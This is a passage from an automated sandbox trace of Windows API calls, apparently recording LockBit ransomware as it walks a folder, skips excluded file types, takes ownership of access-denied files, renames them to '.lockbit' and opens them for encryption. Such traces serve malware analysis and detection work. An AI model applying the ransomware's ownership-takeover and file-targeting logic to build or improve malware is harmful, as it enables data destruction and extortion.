nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0077.705] GetLastError () returned 0x3e5 [0077.705] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0077.705] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0077.705] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.706] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24261f7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24261f7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a538339, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf600, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="boxed-split.avi", cAlternateFileName="")) returned 1 [0077.706] lstrcmpiW (lpString1=".", lpString2="boxed-split.avi") returned -1 [0077.706] lstrcmpiW (lpString1="..", lpString2="boxed-split.avi") returned -1 [0077.706] PathFindExtensionW (pszPath="boxed-split.avi") returned=".avi" [0077.706] lstrcmpiW (lpString1=".386", lpString2=".avi") returned -1 [0077.706] lstrcmpiW (lpString1=".cmd", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".exe", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".ani", lpString2=".avi") returned -1 [0077.706] lstrcmpiW (lpString1=".adv", lpString2=".avi") returned -1 [0077.706] lstrcmpiW (lpString1=".theme", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".msi", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".msp", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".com", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".diagpkg", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".nls", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".diagcab", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".lock", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".ocx", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".mpa", lpString2=".avi") returned 1 [0077.706] lstrcmpiW (lpString1=".cpl", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".mod", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".hta", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".icns", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".prf", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".rtp", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".diagcfg", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".msstyles", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".bin", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".shs", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".drv", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".wpx", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".bat", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".rom", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".msc", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".spl", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".ps1", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".msu", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".ics", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".key", lpString2=".avi") returned 1 [0077.707] lstrcmpiW (lpString1=".mp3", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".reg", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".dll", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".ini", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".idx", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".sys", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".ico", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".lnk", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".rdp", lpString2=".avi") returned 1 [0077.708] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.708] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="boxed-split.avi") returned 1 [0077.708] lstrcmpiW (lpString1="ntldr", lpString2="boxed-split.avi") returned 1 [0077.708] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="boxed-split.avi") returned 1 [0077.708] lstrcmpiW (lpString1="bootsect.bak", lpString2="boxed-split.avi") returned -1 [0077.708] lstrcmpiW (lpString1="autorun.inf", lpString2="boxed-split.avi") returned -1 [0077.708] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0077.708] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned=".avi" [0077.708] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0077.708] lstrcmpiW (lpString1=".7z", lpString2=".avi") returned -1 [0077.708] lstrcmpiW (lpString1=".ckp", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".dacpac", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".db", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".db-shm", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".db-wal", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".db3", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".dbc", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".dbs", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".dbt", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".dbv", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".frm", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".mdf", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".mrg", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".mwb", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".myd", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".ndf", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".qry", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".sdb", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".sdf", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".sql", lpString2=".avi") returned 1 [0077.709] lstrcmpiW (lpString1=".sqlite", lpString2=".avi") returned 1 [0077.710] lstrcmpiW (lpString1=".sqlite3", lpString2=".avi") returned 1 [0077.710] lstrcmpiW (lpString1=".sqlitedb", lpString2=".avi") returned 1 [0077.710] lstrcmpiW (lpString1=".tmd", lpString2=".avi") returned 1 [0077.710] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.lockbit") returned 81 [0077.710] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0077.710] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.lockbit")) returned 0 [0077.710] GetLastError () returned 0x5 [0077.710] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.711] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.711] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.711] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.711] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.711] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.712] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.712] NtQueryInformationFile (in: FileHandle=0x3b4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.725] NtClose (Handle=0x3b4) returned 0x0 [0077.725] RtlFreeAnsiString (AnsiString="\\") [0077.725] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b4) returned 1 [0077.725] malloc (_Size=0x200) returned 0x53fcc0 [0077.725] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.726] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.726] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.726] CloseHandle (hObject=0x3b4) returned 1 [0077.726] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.726] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.727] free (_Block=0x53fcc0) [0077.727] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0077.727] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.lockbit")) returned 1 [0077.728] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0077.729] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.729] malloc (_Size=0x40068) returned 0x20ebb50 [0077.731] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x20ebb68 | out: lpFileSize=0x20ebb68*=62976) returned 1 [0077.731] ReadFile (in: hFile=0x3b4, lpBuffer=0x20ebb84, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50) returned 1 [0077.745] GetLastError () returned 0x3e5 [0077.745] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0077.745] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0077.745] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.745] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244c354, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x244c354, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a55e497, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x30200, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="correct.avi", cAlternateFileName="")) returned 1 [0077.745] lstrcmpiW (lpString1=".", lpString2="correct.avi") returned -1 [0077.745] lstrcmpiW (lpString1="..", lpString2="correct.avi") returned -1 [0077.745] PathFindExtensionW (pszPath="correct.avi") returned=".avi" [0077.745] lstrcmpiW (lpString1=".386", lpString2=".avi") returned -1 [0077.745] lstrcmpiW (lpString1=".cmd", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".exe", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".ani", lpString2=".avi") returned -1 [0077.746] lstrcmpiW (lpString1=".adv", lpString2=".avi") returned -1 [0077.746] lstrcmpiW (lpString1=".theme", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".msi", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".msp", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".com", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".diagpkg", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".nls", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".diagcab", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".lock", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".ocx", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".mpa", lpString2=".avi") returned 1 [0077.746] lstrcmpiW (lpString1=".cpl", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".mod", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".hta", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".icns", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".prf", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".rtp", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".diagcfg", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".msstyles", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".bin", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".shs", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".drv", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".wpx", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".bat", lpString2=".avi") returned 1 [0077.747] lstrcmpiW (lpString1=".rom", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".msc", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".spl", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".ps1", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".msu", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".ics", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".key", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".mp3", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".reg", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".dll", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".ini", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".idx", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".sys", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0077.748] lstrcmpiW (lpString1=".ico", lpString2=".avi") returned 1 [0077.749] lstrcmpiW (lpString1=".lnk", lpString2=".avi") returned 1 [0077.749] lstrcmpiW (lpString1=".rdp", lpString2=".avi") returned 1 [0077.749] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.752] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="correct.avi") returned 1 [0077.752] lstrcmpiW (lpString1="ntldr", lpString2="correct.avi") returned 1 [0077.752] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="correct.avi") returned 1 [0077.752] lstrcmpiW (lpString1="bootsect.bak", lpString2="correct.avi") returned -1 [0077.752] lstrcmpiW (lpString1="autorun.inf", lpString2="correct.avi") returned -1 [0077.752] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0077.752] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned=".avi" [0077.752] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0077.752] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0077.752] lstrcmpiW (lpString1=".7z", lpString2=".avi") returned -1 [0077.752] lstrcmpiW (lpString1=".ckp", lpString2=".avi") returned 1 [0077.752] lstrcmpiW (lpString1=".dacpac", lpString2=".avi") returned 1 [0077.753] lstrcmpiW (lpString1=".db", lpString2=".avi") returned 1 [0077.753] lstrcmpiW (lpString1=".db-shm", lpString2=".avi") returned 1 [0077.753] lstrcmpiW (lpString1=".db-wal", lpString2=".avi") returned 1 [0077.753] lstrcmpiW (lpString1=".db3", lpString2=".avi") returned 1 [0077.753] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0077.754] lstrcmpiW (lpString1=".dbc", lpString2=".avi") returned 1 [0077.754] lstrcmpiW (lpString1=".dbs", lpString2=".avi") returned 1 [0077.754] lstrcmpiW (lpString1=".dbt", lpString2=".avi") returned 1 [0077.754] lstrcmpiW (lpString1=".dbv", lpString2=".avi") returned 1 [0077.754] lstrcmpiW (lpString1=".frm", lpString2=".avi") returned 1 [0077.754] lstrcmpiW (lpString1=".mdf", lpString2=".avi") returned 1 [0077.754] lstrcmpiW (lpString1=".mrg", lpString2=".avi") returned 1 [0077.754] lstrcmpiW (lpString1=".mwb", lpString2=".avi") returned 1 [0077.755] lstrcmpiW (lpString1=".myd", lpString2=".avi") returned 1 [0077.755] lstrcmpiW (lpString1=".ndf", lpString2=".avi") returned 1 [0077.755] lstrcmpiW (lpString1=".qry", lpString2=".avi") returned 1 [0077.755] lstrcmpiW (lpString1=".sdb", lpString2=".avi") returned 1 [0077.755] lstrcmpiW (lpString1=".sdf", lpString2=".avi") returned 1 [0077.755] lstrcmpiW (lpString1=".sql", lpString2=".avi") returned 1 [0077.755] lstrcmpiW (lpString1=".sqlite", lpString2=".avi") returned 1 [0077.755] lstrcmpiW (lpString1=".sqlite3", lpString2=".avi") returned 1 [0077.755] lstrcmpiW (lpString1=".sqlitedb", lpString2=".avi") returned 1 [0077.755] lstrcmpiW (lpString1=".tmd", lpString2=".avi") returned 1 [0077.755] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.lockbit") returned 77 [0077.755] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0077.756] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.lockbit")) returned 0 [0077.880] GetLastError () returned 0x5 [0077.880] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.880] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.880] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.881] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.881] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.881] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3bc, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.882] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.882] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.994] NtClose (Handle=0x3bc) returned 0x0 [0077.994] RtlFreeAnsiString (AnsiString="\\") [0077.994] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3bc) returned 1 [0077.994] malloc (_Size=0x200) returned 0x53fcc0 [0077.994] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.994] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.994] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.994] CloseHandle (hObject=0x3bc) returned 1 [0077.995] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.995] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.996] free (_Block=0x53fcc0) [0077.996] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0077.996] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.lockbit")) returned 1 [0077.997] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0077.997] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.997] malloc (_Size=0x40068) returned 0x206b860 [0077.997] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=197120) returned 1 [0077.997] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0078.070] GetLastError () returned 0x3e5 [0078.070] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0078.070] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0078.070] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0078.071] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24be76b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24be76b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5845f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="delete.avi", cAlternateFileName="")) returned 1 [0078.071] lstrcmpiW (lpString1=".", lpString2="delete.avi") returned -1 [0078.071] lstrcmpiW (lpString1="..", lpString2="delete.avi") returned -1 [0078.071] PathFindExtensionW (pszPath="delete.avi") returned=".avi" [0078.071] lstrcmpiW (lpString1=".386", lpString2=".avi") returned -1 [0078.071] lstrcmpiW (lpString1=".cmd", lpString2=".avi") returned 1 